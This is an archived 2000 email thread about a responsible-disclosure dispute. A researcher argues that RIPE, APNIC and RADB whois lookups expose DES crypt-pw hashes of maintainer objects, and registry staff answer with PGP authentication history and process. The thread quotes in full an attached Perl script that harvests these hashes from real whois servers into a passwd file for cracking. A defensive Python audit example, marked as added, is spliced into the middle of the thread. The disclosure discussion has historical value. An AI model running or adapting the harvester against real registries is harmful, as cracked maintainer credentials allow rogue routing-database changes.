 *     RIPE> strongly discouraged to use encrypted passwords also used
 *     RIPE> for other purposes such as Unix login accounts in this
 *     RIPE> scheme. As you are publishing the encrypted password in the
 *     RIPE> database it is open to attack."
 * 
 *     RIPE> This was re-stated in ripe-153 (published in January 1997)
 *     RIPE> and in ripe-157 (published in May 1997).  In November 1998,
 *     RIPE> ripe-189 was published, in which the RIPE NCC announced that
 *     RIPE> it was supporting PGP authentication in the RIPE Database
 *     RIPE> (the scheme is also described in RFC-2726).  In January
 *     RIPE> 1999, the RIPE NCC published ripe-190, offering free PGP
 *     RIPE> licences on request, to anyone who had a mntner object in
 *     RIPE> the RIPE Database.  At every RIPE Meeting since that time,
 *     RIPE> the RIPE NCC has encouraged the RIPE community to adopt PGP
 *     RIPE> authentication.
 * 
 *     RIPE> The RIPE NCC does not manage the data in the RIPE Network
 *     RIPE> Management Database.  The responsibility for maintaining and
 *     RIPE> protecting the data is with those who put the data in there.
 *     RIPE> However, the RIPE NCC has provided a PGP authentication
 *     RIPE> scheme and encourages its use.
 * 
 *     RIPE> You give a one-week deadline before you make a public
 *     RIPE> statement about this.  We cannot unilaterally change the
 *     RIPE> functionality of the RIPE Database; we only act on the
 *     RIPE> instructions of the RIPE Database Working Group, which has a
 *     RIPE> mailing list: <db-wg@ripe.net>.  We invite you to express
 *     RIPE> your concerns on that list.
 * 
 *     RIPE> BTW, this is the first message from you that I have seen.  I
 *     RIPE> am investigating if we received any other message from you
 *     RIPE> previous to this one.
 * 
 *     RIPE> If you have any more questions, please contact
 *     RIPE> <ripe-dbm@ripe.net>.
 * 
 *     RIPE> Kind regards,
 * 
 *     RIPE> A. M. R. Magee ______________ RIPE NCC
 * 
 * 
 *     RIPE>  Raju Mathur <raju@linux-delhi.org> writes: * -----BEGIN PGP
 *     RIPE> SIGNED MESSAGE----- * Hash: SHA1 * * Hi Bruce, * * I've
 *     RIPE> already sent a copy of this mail to RIPE and RADB.  RADB's
 *     RIPE> reply * basically states that ``it's what the users want, so
 *     RIPE> our hands are * tied'', which isn't very heartening.  I'm
 *     RIPE> still awaiting a response * from RIPE.  * * While I agree
 *     RIPE> that users (in general) should be given what they want, * I
 *     RIPE> would still not (for example) allow a password-less account
 *     RIPE> as a * Unix system administrator.  I have yet to evaluate
 *     RIPE> the extent of * damage that a person with a cracked APNIC,
 *     RIPE> RIPE or RADB password could * do, but I suspect that it
 *     RIPE> could be pretty serious, at least in the * short term.  I
 *     RIPE> presume that even if someone manages to change an * object
 *     RIPE> in your database the owner/maintainer of that object would *
 *     RIPE> still be notified and have the option of correcting the
 *     RIPE> issue; however * even a short-term rogue change in the
 *     RIPE> database can have global routing * and security implications
 *     RIPE> (e.g. a change in the in.addr-arpa database * could be the
 *     RIPE> precursor for major security breaches).  * * Please allow me
 *     RIPE> to reiterate that the policy of displaying CRYPT-PW *
 *     RIPE> passwords without control is viewed by me personally with
 *     RIPE> great * concern, and I suspect that that is the view most
 *     RIPE> security * professionals also would take.  My objective is
 *     RIPE> to have a secure, * stable Internet, and I'm willing to do
 *     RIPE> anything in power to work * towards this goal.  If one of
 *     RIPE> those tasks is to bring potential * security holes into the
 *     RIPE> limelight, I shall do that (by posting to * BUGTRAQ and
 *     RIPE> CERT, albeit reluctantly); before that, however, I would *
 *     RIPE> request you again to fix the problem at the source rather
 *     RIPE> than have * half the script-kiddies in the world trying to
 *     RIPE> attack your databases, * and maybe succeeding.  * * Regards,
 *     RIPE> * * - -- Raju * * >>>>> "Bruce" == Bruce Campbell via RT
 *     RIPE> <technical@apnic.net> writes: * * Bruce>
 *     RIPE> raju@linux-delhi.org wrote (Sat, Nov 25 2000 15:22:36): * >>
 *     RIPE> I see that doing a whois on a maintainer object in your
 *     RIPE> whois * >> database reveals the DES-encrypted password of
 *     RIPE> the maintainer.  * >> As you are aware, it is trivial to
 *     RIPE> brute-force crack (decode) a * >> DES password, and this is
 *     RIPE> a serious security hole in your * >> service.  Please treat
 *     RIPE> this as a critical issue and refrain * >> from revealing the
 *     RIPE> DES-encrypted password in whois lookups.  * * Bruce> The
 *     RIPE> APNIC Whois Databases uses code developed by our sister *
 *     RIPE> Bruce> organisation for Europe (the RIPE NCC) and shares
 *     RIPE> many of * Bruce> the same issues.  The issue regarding the
 *     RIPE> visibility of the * Bruce> 'auth' attribute in the
 *     RIPE> maintainer object has been * Bruce> discussed before,
 *     RIPE> however I regret that I am unable to find * Bruce> an online
 *     RIPE> reference for this discussion.  * * Bruce> I am cc'ing the
 *     RIPE> appropriate address in the RIPE NCC in the * Bruce> hopes
 *     RIPE> that they can provide a more definitive reference ( a *
 *     RIPE> Bruce> reply to the APNIC ticketing system will also reply
 *     RIPE> to the * Bruce> original requestor ).  * * >> I shall be
 *     RIPE> going public with this information in one week.  * >>
 *     RIPE> Request you to have fixed the problem by then.  * * Bruce>
 *     RIPE> Kind regards, * * Bruce> -- Bruce Campbell
 *     RIPE> <bruce.campbell@apnic.net> * Bruce> +61-7-3367-0490 Systems
 *     RIPE> Administrator Regional Internet * Bruce> Registry Asia
 *     RIPE> Pacific Network Information Centre For the * Bruce> Asia
 *     RIPE> Pacific Region http://www.apnic.net/db/ * Bruce>
 *     RIPE> whois.APNIC.net * * * * Bruce>
 *     RIPE> -------------------------------------------- Managed by *
 *     RIPE> Bruce> Request Tracker * -----BEGIN PGP SIGNATURE----- *
 *     RIPE> Version: GnuPG v1.0.1 (GNU/Linux) * Comment: Processed by
 *     RIPE> Mailcrypt 3.5.5 and Gnu Privacy Guard <http://www.gnup *
 *     RIPE> g.org/> * *
 *     RIPE> iEYEARECAAYFAjoiEKgACgkQyWjQ78xo0X/OewCeO209lBqSTBrlWms8j81Lmxtb
 *     RIPE> * vhoAnjvjbJHfE7QQ4scbd8q3ri5bokPF * =mKDL * -----END PGP
 *     RIPE> SIGNATURE----- *
 * 
 * 
 *     RIPE> --- Headers Follow ---
 * 
 *     >> From info@apnic.net Wed Nov 29 20:33:24 2000
 *     RIPE> Received: (from info@localhost) by hadrian.staff.apnic.net
 *     RIPE> (8.9.3/8.9.3) id UAA16430 for technical-ticket; Wed, 29 Nov
 *     RIPE> 2000 20:33:24 +1000 (EST) Received: from guardian.apnic.net
 *     RIPE> (int-gw.staff.apnic.net [192.168.1.254]) by
 *     RIPE> hadrian.staff.apnic.net (8.9.3/8.9.3) with ESMTP id UAA16426
 *     RIPE> for <technical@staff.apnic.net>; Wed, 29 Nov 2000 20:33:24
 *     RIPE> +1000 (EST) Received: (from mail@localhost) by
 *     RIPE> guardian.apnic.net (8.9.3/8.9.3) id UAA29609 for
 *     RIPE> <technical@staff.apnic.net>; Wed, 29 Nov 2000 20:33:24 +1000
 *     RIPE> (EST) Received: from whois1.apnic.net(203.37.255.98) by
 *     RIPE> int-gw.staff.apnic.net via smap (V2.1) id xma029607; Wed, 29
 *     RIPE> Nov 00 20:33:04 +1000 Received: from birch.ripe.net
 *     RIPE> (birch.ripe.net [193.0.1.96]) by ns.apnic.net (8.9.3/8.9.3)
 *     RIPE> with ESMTP id UAA122202 for <technical@apnic.net>; Wed, 29
 *     RIPE> Nov 2000 20:33:04 +1000 (EST) Received: from ripe.net
 *     RIPE> (office.ripe.net [193.0.1.97]) by birch.ripe.net
 *     RIPE> (8.8.8/8.8.8) with ESMTP id LAA24135; Wed, 29 Nov 2000
 *     RIPE> 11:31:26 +0100 (CET) Message-Id:
 *     RIPE> <200011291031.LAA24135@birch.ripe.net> To:
 *     RIPE> raju@linux-delhi.org cc: Bruce Campbell via RT
 *     RIPE> <technical@apnic.net>, gerald@merit.edu (Gerald Andrew
 *     RIPE> Winters), db-admin@radb.net, irrd-team@merit.edu Subject:
 *     RIPE> Re: [APNIC #62050] (technical) Crypted passwords for
 *     RIPE> maintainer objects In-reply-to: Your message of Mon, 27 Nov
 *     RIPE> 2000 13:17:01 +0530.
 *     RIPE> <14882.4469.52414.25633@localhost.localdomain> References:
 *     RIPE> <14882.4469.52414.25633@localhost.localdomain> From: RIPE
 *     RIPE> Database Administration <ripe-dbm@ripe.net> X-Organization:
 *     RIPE> RIPE Network Coordination Centre X-Phone: +31 20 535 4444
 *     RIPE> X-Fax: +31 20 535 4445 Date: Wed, 29 Nov 2000 11:31:25 +0100
 *     RIPE> Sender: ripe-dbm@ripe.net
 * 
 *     RIPE> -------------------------------------------- Managed by
 *     RIPE> Request Tracker
 * 
 * >>>>> "Gerald" == Gerald Andrew Winters <gerald@merit.edu> writes:
 * 
 *     Gerald> Raju,
 *     >> I've already sent a copy of this mail to RIPE and RADB.  RADB's
 *     >> reply basically states that ``it's what the users want, so our
 *     >> hands are tied'', which isn't very heartening.  I'm still
 *     >> awaiting a response from RIPE.
 * 
 *     Gerald> Your characterization of my comments is true.  However, I
 *     Gerald> had much more to say.  I will forward my original response
 *     Gerald> after this email so that others can draw their own
 *     Gerald> conclusions.
 * 
 *     >> While I agree that users (in general) should be given what they
 *     >> want, I would still not (for example) allow a password-less
 *     >> account as a Unix system administrator.
 * 
 *     Gerald> This is an unfair analogy.  The relationship between a
 *     Gerald> Unix sysadmin and his network is very much different
 *     Gerald> between an entire community of users and the registries.
 * 
 *     Gerald> A sysadmin simply su's and makes whatever changes are
 *     Gerald> desired.  In contrast, changes to the technology used at
 *     Gerald> the registries come about from the open standards process.
 *     Gerald> This means changes take place at a slower pace through the
 *     Gerald> meetings and with approval from the entire community.  The
 *     Gerald> reason for this is to avoid dictatorship and general
 *     Gerald> anarchy.  The price for this is a slower migration path
 *     Gerald> for changes.
 * 
 *     >> I have yet to evaluate the extent of damage that a person with
 *     >> a cracked APNIC, RIPE or RADB password could do, but I suspect
 *     >> that it could be pretty serious, at least in the short term.
 * 
 *     Gerald> Very true.
 * 
 *     >> Please allow me to reiterate that the policy of displaying
 *     >> CRYPT-PW passwords without control is viewed by me personally
 *     >> with great concern, and I suspect that that is the view most
 *     >> security professionals also would take.  My objective is to
 *     >> have a secure, stable Internet, and I'm willing to do anything
 *     >> in power to work towards this goal.  If one of those tasks is
 *     >> to bring potential security holes into the limelight,
 * 
 *     Gerald> Very true.  However, your remark is akin to me making an
 *     Gerald> Internet announcement something like, "SNMP v1 community
 *     Gerald> strings are transmitted in cleartext.  This is terrible!
 *     Gerald> You have 1 week to fix it and then I'm going public."
 *     Gerald> It's old news.  We all know it and dislike it as much as
 *     Gerald> you.
 * 
 *     Gerald> And what about "MAIL-FROM" authentication?  You do not
 *     Gerald> include this in your remarks.  Certainly your observations
 *     Gerald> would be more potent by adding "MAIL-FROM".
 * 
 *     Gerald> Have you read RFC 2726?  Do you realize that all users can
 *     Gerald> use this form of authentication?
 * 
 *     >> I shall do that (by posting to BUGTRAQ and CERT, albeit
 *     >> reluctantly); before that, however, I would request you again
 *     >> to fix the problem at the source rather than have half the
 *     >> script-kiddies in the world trying to attack your databases,
 *     >> and maybe succeeding.
 * 
 *     Gerald> The registries will not unilaterally go into the
 *     Gerald> databases and change data or implement new security
 *     Gerald> features without the approval of the community.  What you
 *     Gerald> are suggesting won't work anyway (ie, you still have the
 *     Gerald> "MAIL-FROM" problem).
 * 
 *     Gerald> We are all sympathetic to your criticism.  In fact the
 *     Gerald> RIPE NCC and myself have gotten up numerous times at
 *     Gerald> public forums (ripe, ietf, ...)  and urged the public to
 *     Gerald> convert to PGP authentication.  The registries agree with
 *     Gerald> you but real change must come from the community.
 * 
 *     Gerald> I would suggest to you to come to the meetings and make
 *     Gerald> your proposal.  I'm sure you will have *many* supporters.
 * 
 *     Gerald> --Gerald Winters
 * 
 * --[[application/octet-stream
 * Content-Disposition: attachment; filename="who.pl"][quoted-printable]]
 * #!/usr/bin/perl -w
 * #
 * # Brute force create a /etc/passwd-like file with DES-encrypted passwords
 * # from dumb whois lookups on RIPE and APNIC.  Can be easily modified
 * # to handle RADB too.  Once the file is created, run Crack (or your favourite
 * # DES-crack program) on it and create some headache for the ``Internet
 * # community'' which has decided to reveal DES-encoded passwords as part
 * # of a whois lookup on a maintainer object.
 * #
 * # Copyright 2000, Raju Mathur <raju@linux-delhi.org>, <raju@kandalaya.org>
 * #
 * # This program is available under the terms of the GNU General Public License
 * #
 * use strict ;
 * #
 * # Currently will work on RIPE and APNIC
 * #
 * my
 *   $count = 0 ;
 * my
 *   $outfile = shift ;
 * my
 *   $registry = shift ;
 * if ( !defined $outfile || !defined $registry
 *      || $registry !~ /apnic/i && $registry !~ /ripe/i )
 * {
 *   print STDERR "usage: $0 output-file APNIC|RIPE [start AS] [end AS]\n" ;
 *   exit 1 ;
 * }
 * open OUT , ">$outfile"
 *   or die "Cannot write to $outfile: $!\n" ;
 * my
 *   $startas = shift ;
 * $startas = 1
 *   if !defined $startas ;
 * my
 *   $endas = shift ;
 * $endas = 12000
 *   if !defined $endas ;
 * my
 *   $server = "whois.apnic.net" ;
 * $server = "whois.ripe.net"
 *   if $registry =~ /ripe/i ;
 * my
 *   $maintainer ;
 * my
 *   $descr ;
 * my
 *   $notify ;
 * my
 *   $auth ;
 * my
 *   $passwd ;
 * foreach my $i ( $startas..$endas )
 * {
 *   print "*** AS$i\n" ;
 *   open WHOIS , "whois AS$i\@$server|"
 *     or die "Cannot whois AS$i: $!\n" ;
 *   while ( <WHOIS> )
 *   {
 *     if ( /^mnt-by:\s*(.*)/ )
 *     {
 *       $maintainer = $1 ;
 *       last ;
 *     }
 *   }
 *   close WHOIS ;
 *   next
 *     if !$maintainer ;
 *   print "*** $maintainer\n" ;
 *   open WHOIS , "whois $maintainer\@$server|"
 *     or die "Cannot whois $maintainer: $!\n" ;
 *   $descr = "" ;
 *   while ( <WHOIS> )
 *   {
 *     if ( $_ =~ /^descr:\s*(.*)/ )
 *     {
 *       $descr .= "$1, " ;
 *     }
 *     if ( $_ =~ /^mnt-nfy:\s*(.*)/ )
 *     {
 *       $notify = $1 ;
 *     }
 *     if ( $_ =~ /^auth:\s*(.*)/ )
 *     {
 *       $auth = $1 ;
 *     }
 *     last if $auth && $auth =~ /crypt-pw/i ;
 *   }
 *   next
 *     if !$auth || $auth !~ /crypt-pw/i ;
 * print "*** <$descr> <$notify> <$auth>\n" ;
 *   close WHOIS ;
 *   $auth =~ /.*crypt-pw\s*(.*)/i ;
 *   $passwd = $1 ;
 *   $descr =~ s/[\n:]//g ;
 *   $notify =~ s/://g ;
 *   print OUT "$maintainer:$passwd:42:42:$descr:/dev/null:/bin/sh\n" ;
 *   $auth = "" ;
 *   $count++ ;
 * }
 * close OUT ;
 * print "$count records\n" ;
 * 
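
Added example, not part of the original messages and not any registry's code: a maintainer-side audit of a mntner object that flags the auth schemes criticised in this thread (CRYPT-PW, MAIL-FROM), recognises PGP keys (RFC 2726), and renders the kind of filtered public view the thread asks for. The sample object, the function names and the "[filtered]" marker are assumptions made for illustration.

```python
import re

# Constructed whois reply for a mntner object; not real registry data.
SAMPLE_WHOIS = """\
% constructed whois reply, not real registry data
mntner:   EXAMPLE-MNT
descr:    Example maintainer
          (continued description line)
mnt-nfy:  noc@example.net
auth:     CRYPT-PW zzCONSTRUCTED
auth:     MAIL-FROM .*@example\\.net
auth:     PGPKEY-0123ABCD
mnt-by:   EXAMPLE-MNT
"""

ATTR_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*):[ \t]*(.*)$")

# Schemes the thread calls out as weak, with the reason to report.
WEAK_REASONS = {
    "CRYPT-PW": "hash is published in the object and open to exhaustive search",
    "MAIL-FROM": "relies on a forgeable From: header",
}


def parse_attributes(text):
    """Return [(name, value)] pairs, folding continuation lines into the previous value."""
    attrs = []
    for line in text.splitlines():
        if not line.strip() or line.startswith(("%", "#")):
            continue  # blank line or server comment
        m = ATTR_RE.match(line)
        if m:
            attrs.append([m.group(1).lower(), m.group(2).strip()])
        elif attrs and line[0] in " \t+":
            # continuation lines start with whitespace or '+'
            attrs[-1][1] += " " + line.lstrip(" \t+").strip()
    return [tuple(a) for a in attrs]


def classify_auth(value):
    """Map one auth value to (scheme, strength, reason)."""
    scheme = value.split(None, 1)[0].upper() if value else ""
    if scheme in WEAK_REASONS:
        return scheme, "weak", WEAK_REASONS[scheme]
    if scheme.startswith("PGPKEY-"):
        return "PGPKEY", "strong", "signed updates (RFC 2726)"
    return scheme or "(empty)", "unknown", "scheme not covered by this audit"


def audit_mntner(text):
    """Audit one mntner object and report every auth line it carries."""
    attrs = parse_attributes(text)
    name = next((v for k, v in attrs if k == "mntner"), None)
    findings = [classify_auth(v) for k, v in attrs if k == "auth"]
    # Any single matching auth line authorises an update, so one weak
    # line leaves the whole object weak even when a PGP key is present.
    weak = any(strength == "weak" for _, strength, _ in findings)
    return {"mntner": name, "findings": findings, "weak": weak}


REDACT_RE = re.compile(r"^(auth:[ \t]*CRYPT-PW)[ \t]+\S+", re.IGNORECASE | re.MULTILINE)


def redact_public_view(text):
    """Return the object as a public whois view with the CRYPT-PW hash withheld."""
    return REDACT_RE.sub(r"\1 [filtered]", text)


if __name__ == "__main__":
    report = audit_mntner(SAMPLE_WHOIS)
    print(report["mntner"], "weak" if report["weak"] else "ok")
    for scheme, strength, reason in report["findings"]:
        print(f"  {scheme:10} {strength:8} {reason}")
    print(redact_public_view(SAMPLE_WHOIS))
```

The sample object stays flagged despite its PGP key, because the CRYPT-PW and MAIL-FROM lines remain alternative ways to authorise an update until they are removed.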

From technical@apnic.net  Sat Dec  2 09:02:19 2000
X-VM-v5-Data: ([nil nil nil nil nil nil nil nil nil]
	["19664" "Saturday" "2" "December" "2000" "03:39:23" "+1000" "RIPE Database Administration  via RT" "technical@apnic.net" nil "432" "[APNIC #62050] (technical) Crypted passwords for maintainer objects " "^From:" nil nil "12" nil nil (number " " mark "     RIPE Database Adm Dec  2  432/19664 " thread-indent "\"[APNIC #62050] (technical) Crypted passwords for maintainer objects \"\n") nil nil]
	nil)
Return-Path: <technical@apnic.net>
Received: from localhost (IDENT:raju@localhost [127.0.0.1])
	by ganwaar.com (8.9.3/8.9.3) with ESMTP id JAA03733
	for <raju@localhost>; Sat, 2 Dec 2000 09:02:15 +0530
X-POP3-Rcpt: raju@linux-delhi.org
Received: from linux-delhi.org
	by localhost with POP3 (fetchmail-5.3.1)
	for raju@localhost (single-drop); Sat, 02 Dec 2000 09:02:15 +0530 (IST)
Received: from guardian.apnic.net (guardian.apnic.net [203.37.255.100])
	by biznetindia.com (8.10.2/8.10.2) with ESMTP id eB1HeA329340
	for <raju@linux-delhi.org>; Fri, 1 Dec 2000 12:40:11 -0500
Received: (from mail@localhost)
	by guardian.apnic.net (8.9.3/8.9.3) id DAA26193
	for <raju@linux-delhi.org>; Sat, 2 Dec 2000 03:40:01 +1000 (EST)
Received: from hadrian.staff.apnic.net(192.168.1.1) by int-gw.staff.apnic.net via smap (V2.1)
	id xma026191; Sat, 2 Dec 00 03:39:33 +1000
Received: (from daemon@localhost)
	by hadrian.staff.apnic.net (8.9.3/8.9.3) id DAA04398;
	Sat, 2 Dec 2000 03:39:23 +1000 (EST)
Message-Id: <200012011739.DAA04398@hadrian.staff.apnic.net>
Reply-To: RIPE Database Administration  via RT <technical@apnic.net>
X-Request-ID: 62050
X-RT-Loop-Prevention: APNIC
X-Sender: ripe-dbm@ripe.net
X-Managed-By: Request Tracker 1.0.1 (http://www.fsck.com/projects/rt)
Precedence:  
X-RT-MIME-Found: No
From: RIPE Database Administration  via RT <technical@apnic.net>
To: raju@linux-delhi.org
Cc: 
Subject: [APNIC #62050] (technical) Crypted passwords for maintainer objects 
Date: Sat, 2 Dec 2000 03:39:23 +1000 (EST)
Status: RO

Dear Raju Mathur,

 Raju Mathur <raju@linux-delhi.org> writes:
 * [Munging two messages into one reply to keep everyone in sync]
 * 
 * Hi Gerald, Mr/Ms Magee,
 * 
 * Calculate cost of 1% of maintainer objects in the databases getting
 * perverted using a script like the attached one.  Weigh against cost of
 * public outcry if you unilaterally decide to not reveal auth schemes in
 * whois lookups.  Decide which is cheaper.
 * 
 * I'm not going public with the script until either a deadline for
 * changing the whois behaviour determined by you passes, or you decide
 * not to make such a deadline.

In January 1999, RIPE NCC deployed a PGP scheme for authenticating
updates in the RIPE Database and the RIPE NCC encouraged the RIPE
community to use it and continues to do so.
 
The RIPE NCC can only change the functionality of the RIPE Database on
the request of the RIPE Database Working Group, which has a well-defined
procedure for discussing proposed changes.  Its mailing list is
<db-wg@ripe.net> and you are most welcome to express your concerns on
that list and/or at a RIPE meeting. The next meeting is in January 2001, in 
Amsterdam, the Netherlands.

If you have any more questions, please contact
<ripe-dbm@ripe.net>.

Regards,

A. M. R. Magee
______________
RIPE NCC 

> 
 * 
 * Regards,
 * 
 * -- Raju
 * 
 * >>>>> "RIPE" == RIPE Database Administration via RT <technical@apnic.net> writes:
 * 
 *     RIPE> Dear Raju Mathur, This matter was originally raised in
 *     RIPE> October 1994, when the RIPE document ripe-120
 *     RIPE> (ftp://ftp.ripe.net/ripe/docs/ripe-120.txt) was published:
 * 
 *     RIPE> "It is by no means meant to keep out a determined malicious
 *     RIPE> attacker. The crypt function is vulnerable to exhaustive
 *     RIPE> search by (lots of) fast machines and programs to do the
 *     RIPE> searching are widely available.  For this reason it is
 *     RIPE> strongly discouraged to use encrypted passwords also used
 *     RIPE> for other purposes such as Unix login accounts in this
 *     RIPE> scheme. As you are publishing the encrypted password in the
 *     RIPE> database it is open to attack."
 * 
 *     RIPE> This was re-stated in ripe-153 (published in January 1997)
 *     RIPE> and in ripe-157 (published in May 1997).  In November 1998,
 *     RIPE> ripe-189 was published, in which the RIPE NCC announced that
 *     RIPE> it was supporting PGP authentication in the RIPE Database
 *     RIPE> (the scheme is also described in RFC-2726).  In January
 *     RIPE> 1999, the RIPE NCC published ripe-190, offering free PGP
 *     RIPE> licences on request, to anyone who had a mntner object in
 *     RIPE> the RIPE Database.  At every RIPE Meeting since that time,
 *     RIPE> the RIPE NCC has encouraged the RIPE community to adopt PGP
 *     RIPE> authentication.
 * 
 *     RIPE> The RIPE NCC does not manage the data in the RIPE Network
 *     RIPE> Management Database.  The responsibility for maintaining and
 *     RIPE> protecting the data is with those who put the data in there.
 *     RIPE> However, the RIPE NCC has provided a PGP authentication
 *     RIPE> scheme and encourages its use.
 * 
 *     RIPE> You give a one-week deadline before you make a public
 *     RIPE> statement about this.  We cannot unilaterally change the
 *     RIPE> functionality of the RIPE Database; we only act on the
 *     RIPE> instructions of the RIPE Database Working Group, which has a
 *     RIPE> mailing list: <db-wg@ripe.net>.  We invite you to express
 *     RIPE> your concerns on that list.
 * 
 *     RIPE> BTW, this is the first message from you that I have seen.  I
 *     RIPE> am investigating if we received any other message from you
 *     RIPE> previous to this one.
 * 
 *     RIPE> If you have any more questions, please contact
 *     RIPE> <ripe-dbm@ripe.net>.
 * 
 *     RIPE> Kind regards,
 * 
 *     RIPE> A. M. R. Magee ______________ RIPE NCC
 * 
 * 
 *     RIPE>  Raju Mathur <raju@linux-delhi.org> writes: * -----BEGIN PGP
 *     RIPE> SIGNED MESSAGE----- * Hash: SHA1 * * Hi Bruce, * * I've
 *     RIPE> already sent a copy of this mail to RIPE and RADB.  RADB's
 *     RIPE> reply * basically states that ``it's what the users want, so
 *     RIPE> our hands are * tied'', which isn't very heartening.  I'm
 *     RIPE> still awaiting a response * from RIPE.  * * While I agree
 *     RIPE> that users (in general) should be given what they want, * I
 *     RIPE> would still not (for example) allow a password-less account
 *     RIPE> as a * Unix system administrator.  I have yet to evaluate
 *     RIPE> the extent of * damage that a person with a cracked APNIC,
 *     RIPE> RIPE or RADB password could * do, but I suspect that it
 *     RIPE> could be pretty serious, at least in the * short term.  I
 *     RIPE> presume that even if someone manages to change an * object
 *     RIPE> in your database the owner/maintainer of that object would *
 *     RIPE> still be notified and have the option of correcting the
 *     RIPE> issue; however * even a short-term rogue change in the
 *     RIPE> database can have global routing * and security implications
 *     RIPE> (e.g. a change in the in.addr-arpa database * could be the
 *     RIPE> precursor for major security breaches).  * * Please allow me
 *     RIPE> to reiterate that the policy of displaying CRYPT-PW *
 *     RIPE> passwords without control is viewed by me personally with
 *     RIPE> great * concern, and I suspect that that is the view most
 *     RIPE> security * professionals also would take.  My objective is
 *     RIPE> to have a secure, * stable Internet, and I'm willing to do
 *     RIPE> anything in power to work * towards this goal.  If one of
 *     RIPE> those tasks is to bring potential * security holes into the
 *     RIPE> limelight, I shall do that (by posting to * BUGTRAQ and
 *     RIPE> CERT, albeit reluctantly); before that, however, I would *
 *     RIPE> request you again to fix the problem at the source rather
 *     RIPE> than have * half the script-kiddies in the world trying to
 *     RIPE> attack your databases, * and maybe succeeding.  * * Regards,
 *     RIPE> * * - -- Raju * * >>>>> "Bruce" == Bruce Campbell via RT
 *     RIPE> <technical@apnic.net> writes: * * Bruce>
 *     RIPE> raju@linux-delhi.org wrote (Sat, Nov 25 2000 15:22:36): * >>
 *     RIPE> I see that doing a whois on a maintainer object in your
 *     RIPE> whois * >> database reveals the DES-encrypted password of
 *     RIPE> the maintainer.  * >> As you are aware, it is trivial to
 *     RIPE> brute-force crack (decode) a * >> DES password, and this is
 *     RIPE> a serious security hole in your * >> service.  Please treat
 *     RIPE> this as a critical issue and refrain * >> from revealing the
 *     RIPE> DES-encrypted password in whois lookups.  * * Bruce> The
 *     RIPE> APNIC Whois Databases uses code developed by our sister *
 *     RIPE> Bruce> organisation for Europe (the RIPE NCC) and shares
 *     RIPE> many of * Bruce> the same issues.  The issue regarding the
 *     RIPE> visibility of the * Bruce> 'auth' attribute in the
 *     RIPE> maintainer object has been * Bruce> discussed before,
 *     RIPE> however I regret that I am unable to find * Bruce> an online
 *     RIPE> reference for this discussion.  * * Bruce> I am cc'ing the
 *     RIPE> appropriate address in the RIPE NCC in the * Bruce> hopes
 *     RIPE> that they can provide a more definitive reference ( a *
 *     RIPE> Bruce> reply to the APNIC ticketing system will also reply
 *     RIPE> to the * Bruce> original requestor ).  * * >> I shall be
 *     RIPE> going public with this information in one week.  * >>
 *     RIPE> Request you to have fixed the problem by then.  * * Bruce>
 *     RIPE> Kind regards, * * Bruce> -- Bruce Campbell
 *     RIPE> <bruce.campbell@apnic.net> * Bruce> +61-7-3367-0490 Systems
 *     RIPE> Administrator Regional Internet * Bruce> Registry Asia
 *     RIPE> Pacific Network Information Centre For the * Bruce> Asia
 *     RIPE> Pacific Region http://www.apnic.net/db/ * Bruce>
 *     RIPE> whois.APNIC.net * * * * Bruce>
 *     RIPE> -------------------------------------------- Managed by *
 *     RIPE> Bruce> Request Tracker * -----BEGIN PGP SIGNATURE----- *
 *     RIPE> Version: GnuPG v1.0.1 (GNU/Linux) * Comment: Processed by
 *     RIPE> Mailcrypt 3.5.5 and Gnu Privacy Guard <http://www.gnup *
 *     RIPE> g.org/> * *
 *     RIPE> iEYEARECAAYFAjoiEKgACgkQyWjQ78xo0X/OewCeO209lBqSTBrlWms8j81Lmxtb
 *     RIPE> * vhoAnjvjbJHfE7QQ4scbd8q3ri5bokPF * =mKDL * -----END PGP
 *     RIPE> SIGNATURE----- *
 * 
 * 
 *     RIPE> --- Headers Follow ---
 * 
 *     >> From info@apnic.net Wed Nov 29 20:33:24 2000
 *     RIPE> Received: (from info@localhost) by hadrian.staff.apnic.net
 *     RIPE> (8.9.3/8.9.3) id UAA16430 for technical-ticket; Wed, 29 Nov
 *     RIPE> 2000 20:33:24 +1000 (EST) Received: from guardian.apnic.net
 *     RIPE> (int-gw.staff.apnic.net [192.168.1.254]) by
 *     RIPE> hadrian.staff.apnic.net (8.9.3/8.9.3) with ESMTP id UAA16426
 *     RIPE> for <technical@staff.apnic.net>; Wed, 29 Nov 2000 20:33:24
 *     RIPE> +1000 (EST) Received: (from mail@localhost) by
 *     RIPE> guardian.apnic.net (8.9.3/8.9.3) id UAA29609 for
 *     RIPE> <technical@staff.apnic.net>; Wed, 29 Nov 2000 20:33:24 +1000
 *     RIPE> (EST) Received: from whois1.apnic.net(203.37.255.98) by
 *     RIPE> int-gw.staff.apnic.net via smap (V2.1) id xma029607; Wed, 29
 *     RIPE> Nov 00 20:33:04 +1000 Received: from birch.ripe.net
 *     RIPE> (birch.ripe.net [193.0.1.96]) by ns.apnic.net (8.9.3/8.9.3)
 *     RIPE> with ESMTP id UAA122202 for <technical@apnic.net>; Wed, 29
 *     RIPE> Nov 2000 20:33:04 +1000 (EST) Received: from ripe.net
 *     RIPE> (office.ripe.net [193.0.1.97]) by birch.ripe.net
 *     RIPE> (8.8.8/8.8.8) with ESMTP id LAA24135; Wed, 29 Nov 2000
 *     RIPE> 11:31:26 +0100 (CET) Message-Id:
 *     RIPE> <200011291031.LAA24135@birch.ripe.net> To:
 *     RIPE> raju@linux-delhi.org cc: Bruce Campbell via RT
 *     RIPE> <technical@apnic.net>, gerald@merit.edu (Gerald Andrew
 *     RIPE> Winters), db-admin@radb.net, irrd-team@merit.edu Subject:
 *     RIPE> Re: [APNIC #62050] (technical) Crypted passwords for
 *     RIPE> maintainer objects In-reply-to: Your message of Mon, 27 Nov
 *     RIPE> 2000 13:17:01 +0530.
 *     RIPE> <14882.4469.52414.25633@localhost.localdomain> References:
 *     RIPE> <14882.4469.52414.25633@localhost.localdomain> From: RIPE
 *     RIPE> Database Administration <ripe-dbm@ripe.net> X-Organization:
 *     RIPE> RIPE Network Coordination Centre X-Phone: +31 20 535 4444
 *     RIPE> X-Fax: +31 20 535 4445 Date: Wed, 29 Nov 2000 11:31:25 +0100
 *     RIPE> Sender: ripe-dbm@ripe.net
 * 
 *     RIPE> -------------------------------------------- Managed by
 *     RIPE> Request Tracker
 * 
 * >>>>> "Gerald" == Gerald Andrew Winters <gerald@merit.edu> writes:
 * 
 *     Gerald> Raju,
 *     >> I've already sent a copy of this mail to RIPE and RADB.  RADB's
 *     >> reply basically states that ``it's what the users want, so our
 *     >> hands are tied'', which isn't very heartening.  I'm still
 *     >> awaiting a response from RIPE.
 * 
